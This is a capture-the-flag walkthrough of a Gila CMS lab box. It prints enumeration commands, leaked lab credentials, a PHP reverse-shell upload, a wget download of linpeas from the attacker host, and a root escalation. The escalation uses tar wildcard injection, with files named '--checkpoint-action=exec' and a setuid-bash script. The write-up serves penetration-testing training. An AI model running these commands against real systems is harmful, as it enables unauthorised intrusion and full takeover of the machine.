Table of contents
This is a really great medium-level box that involves enumerating subdomains and discovering sensitive information on /dev
, including the email and password for the Gila CMS admin user. Utilizing these credentials, one can log in via /login
. Once inside, you have the ability to upload a php
reverse shell, granting us a foothold into the system. From this point, we located the user password in a backup file under /opt
. Through further system enumeration, we elevated our privileges and rooted the box using wildcard injection.
Room
Enumeration:
First we're going to do an initial scan with Nmap to start looking for all ports on the target machine.
sudo nmap -p- --min-rate=5000 -oG CMess 10.10.204.141 --vv
Searching the file CMess to look ports that are open
grep -oP '([\d]+/open)' CMess | awk -F / '{ print $1 }' | tr '\n' ','
Upon our scan we encountered two port that are open one 22 ssh port and the other port 80 http port. The command above it's pretty useful if you've a lot of ports open on the target machine.
└──╼ $nmap -sVC -p "22,80" -T4 10.10.204.141
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-05 17:09 EST
Nmap scan report for 10.10.204.141
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d9b652d3939a3850b4233bfd210c051f (RSA)
| 256 21c36e318b85228a6d72868fae64662b (ECDSA)
|_ 256 5bb9757805d7ec43309617ffc6a86ced (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 3 disallowed entries
|_/src/ /themes/ /lib/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-generator: Gila CMS
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.52 seconds
Adding the domain name to the /etc/hosts
file.
$echo "10.10.204.141 cmess.thm" | sudo tee -a /etc/hosts
[sudo] password for user:
10.10.204.141 cmess.thm
Navigating to the website we can see it's Gila CMS an open source content management system, We can do a vulnerability scan on this to check if we can get known public vulnerabilities.
I used searchsploit
tool and also did it on google search.
Upon we doing so we found several vulnerabilities but they're not gonna work simply because XSS vulnerability can't get us a shell on the machine considering that there's no user interaction and the other like LFI SQLi vulnerabilities require admin authentication which we don't have the credentials for it lasty the RCE didn't work.
Consequently we did is running the gobuster
to check for directories and files on the target.
gobuster dir -u http://cmess.thm/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
We got tons of webpages, most of them useless except /login
and /admin
, but we need credentials in order to log in to the account as an admin or a user.
Next thing we are going to enumerate subdomains.
wfuzz -c -w top1million.txt -u "http://cmess.thm" -H "Host: FUZZ.cmess.thm" --hl 107
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://cmess.thm/
Total requests: 4989
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000019: 200 30 L 104 W 934 Ch "dev"
Adding again the subdomain to the /etc/hosts
file.
echo "10.10.69.214 dev.cmess.thm" | sudo tee -a /etc/hosts
We exposed the development log that contains sensitive information. We can try to login to ssh with the password but it didn't work. we used this credentials to login as admin via /admin
and it works.
The credentials that we used:andre@cmess.thm
KPFTN_f2yxe%
Now we're in the dashboard however there's a lot going on here we can start test for things.
Foothold
Go to content then file manager as you observe we've the ability to upload file on the sever. this will give as chance to upload php
reverse shell and get RCE on the sever.
Before we do that we need to make some adjustment on the reverse shell. If your using ParrotOS the file is found on this path /usr/share/webshells/php/php-reverse-shell.php
.
Then upload the php
file, once you uploaded it you can navigate to the assets folder and run the reverse shell by clicking on the file that you've uploaded it.
Make sure you have a listener up and running!
Boom we got a shell on the box, and we can get the user flag.
For more interacting with terminal it's better to upgrade the shell or stabilizing it so you can do the basic things that the terminal support like crl+c
or clear command or maybe navigating with arrow keys.
This will accomplish two things first it will turns off our own terminal echo (which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes). It then foregrounds the shell.
This will give us access to term commands such as clear
.
Privilege Escalation:
So far this is one the most challenging privesc that I have encountered it's required a good enumeration to get this one done. It's kind of tricky how we're going to perform it, Before we go a head, first we need to download the linpeas on the target machine.
ww-data@cmess:/tmp$ wget http://10.11.46.4:8000/linpeas.sh -O linpeas.sh
--2023-12-08 21:53:06-- http://10.11.46.4:8000/linpeas.sh
Connecting to 10.11.46.4:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 847773 (828K) [text/x-sh]
Saving to: 'linpeas.sh'
linpeas.sh 100%[===================>] 827.90K 94.2KB/s in 6.0s
2023-12-08 21:53:12 (137 KB/s) - 'linpeas.sh' saved [847773/847773]
www-data@cmess:/tmp$ chmod +x linpeas.sh
www-data@cmess:/tmp$ ./linpeas.sh
Running linpeas
we discovered the password was hidden in /opt
directory under the file .password.bak
and then we used it against the andre user. And also, linpeas highlighted a cron job which we'll go after that.
As you can see, the password is 'UQfsdCB7aAP6' and we executed the awk
command to filter the stored user information in the system file /etc/passwd
. Upon inspection, we identified a user named Andre, indicating that the recently discovered password may belong to him.
Indeed we successfully managed to compromise his account, and the user flag stored in a user.txt file.
Now, if you ran linpeas
you'll immediately see a cron job highlighted in red that's schedule tar
command to run every two minutes as root and backing up all files and directories on the backup
directory to /tmp
folder.
andre@cmess:/tmp$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/2 * * * * root cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *
There's a command injection on the wildcard so we can inject our script ( that'd be a reverse shell or any malicious file that we have created) as a command to run as root by tar since tar
run as root user and presumably give as shell that we can interact with, we can leverage this by using the options.
If you check the manual page for tar
you'll see the following:
-checkpoint[=N]
Display progress messages every Nth record (default 10).--checkpoint-action=ACTION
Run ACTION on each checkpoint.
This option will allow as to run the malicious file that we created, hence --checkpoint-action=ACTION
will be used as an option by tar
command when it'll be running at it's hits the time specified by cron.
andre@cmess:/tmp$ cd /home/andre/backup
andre@cmess:~/backup$ cat note
Note to self.
Anything in here will be backed up!
shdre@cmess:~/backup$ echo "cp /bin/bash /tmp/bash; chmod +s /tmp/bash" > shell.sh
andre@cmess:~/backup$ chmod +x runme.sh
andre@cmess:~/backup$ touch /home/andre/backup/--checkpoint=1
andre@cmess:~/backup$ touch /home/andre/backup/--checkpoint-action=exec=sh\ shell.sh
Copy
Wait about 2 minutes and check the /tmp
folder and you will eventually get root shell